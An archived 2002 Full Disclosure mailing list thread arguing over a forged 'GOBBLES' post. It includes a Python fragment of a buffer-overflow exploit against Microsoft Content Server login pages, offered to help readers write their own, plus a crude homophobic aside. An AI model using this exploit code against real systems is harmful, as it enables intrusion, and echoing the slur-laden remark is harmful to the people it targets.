|
Full Disclosure
mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (Anthony LaMantia)
Date: 13 Aug 2002 19:24:43 -0700
lol, well bugtraq is no diffrent the dallas proxy was hacked a month or
so back and all of the e-mail address it pwds: to published lol
besides dont you know this is the first front the anti-white-war started
by gayh1tler.. there is a lot of shit going down.. this list isn't goona
be the worst part
-Anthony LaMantia
www.bia-security.com
On Wed, 2002-08-14 at 15:17, security-protocols () hushmail com wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Maybe noone has noticed this but,
this person is sending as 'gobbles () hush com' and not the real 'gobbles () hushmail com'.
See below:
@hush.com email addresses
27/7/02 - Is yourname @hushmail.com already taken? Sign up now for a hush.com email address.
- - -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
You supposed to be turkey friend turkey crew wanttobe yet you question
show respect to turkey
On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:
At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.
-dave
ObExploit:
#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/ #but
if you're not a member, this might save you some time writing your
#exploit.
#returns the sploitstring
def makesploit(self):
header=""
body=""
body+="NR_DOMAIN=WinNT%3A%2F%2F"
#1 alignment byte so we are word aligned with the return addr
attack=""
attack+="A"
attack+="\x41\xb9"*4000
#unicode shellcode!!
attack=stroverwrite(attack,unicodeloop,1)
print "length of overflow = "+str(len(attack))
attack=urllib.quote(attack)
#print attack
body+=attack
body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS
WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest
Login.asp"
header+="POST /NR/System/Access/ManualLoginSubmit.asp
HTTP/1.1\r\n"
header+="Host: "+self.host+"\r\n"
header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows
NT; Bob)\r\n"
header+="Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla
in
;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q
=0.1\r\n"
header+="Connection: keep-alive\r\n"
header+="Content-Type: application/x-www-form-urlencoded\r\n"
header+="Content-Length: "+str(len(body))+"\r\n"
header+="\r\n"
return header+body
#this stuff happens.
if __name__ == '__main__':
print "Running Microsoft Content Server exploit v 0.1"
app = mscsexploit()
if len(sys.argv) < 2:
print "Usage: mycontent.py target [port] [ssl=0]"
sys.exit()
app.setHost(sys.argv[1])
if len(sys.argv) > 2:
app.setPort(int(sys.argv[2]))
if len(sys.argv) > 3:
app.setSSL(1)
app.run()
On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
or if you like
On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com>
wrote:
On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
Gobbles,
On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:
GOBBLES just want to be cool whitehat like everyone else. Time
for
new
leaf time for six figure salary stock option naked breasted
assistant.
Word to that my man! ;)
peace,
core
Your message was signed, but the "GOBBLES" message was not and
therefore just a forgery, most likely.
BTW:
http://www.immunitysec.com/vulnerabilities/
They arn't advisories, but if you need something to show to your
boss about why you disconnected your Exchange/SQL server from the
Internet, it's a good start.
Dave Aitel
Immunity, Inc
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----
Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name?
http://www.hush.com/partners/of
fers.cgi?id=domainpeople
- - -----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
=9eW6
- - -----END PGP SIGNATURE-----
Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wmcEARECACcFAj1a1V8gHHNlY3VyaXR5LXByb3RvY29sc0BodXNobWFpbC5jb20ACgkQ
NAoGe68ymd16tACdGhj0H0rmHla8zAQMPX/Vh5Wya8QAn3FK7K4C1+h8RqTLjIBPKU3M
d18c
=gcJ+
-----END PGP SIGNATURE-----
Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 By Date 
By Thread
Current thread:
|
Intro
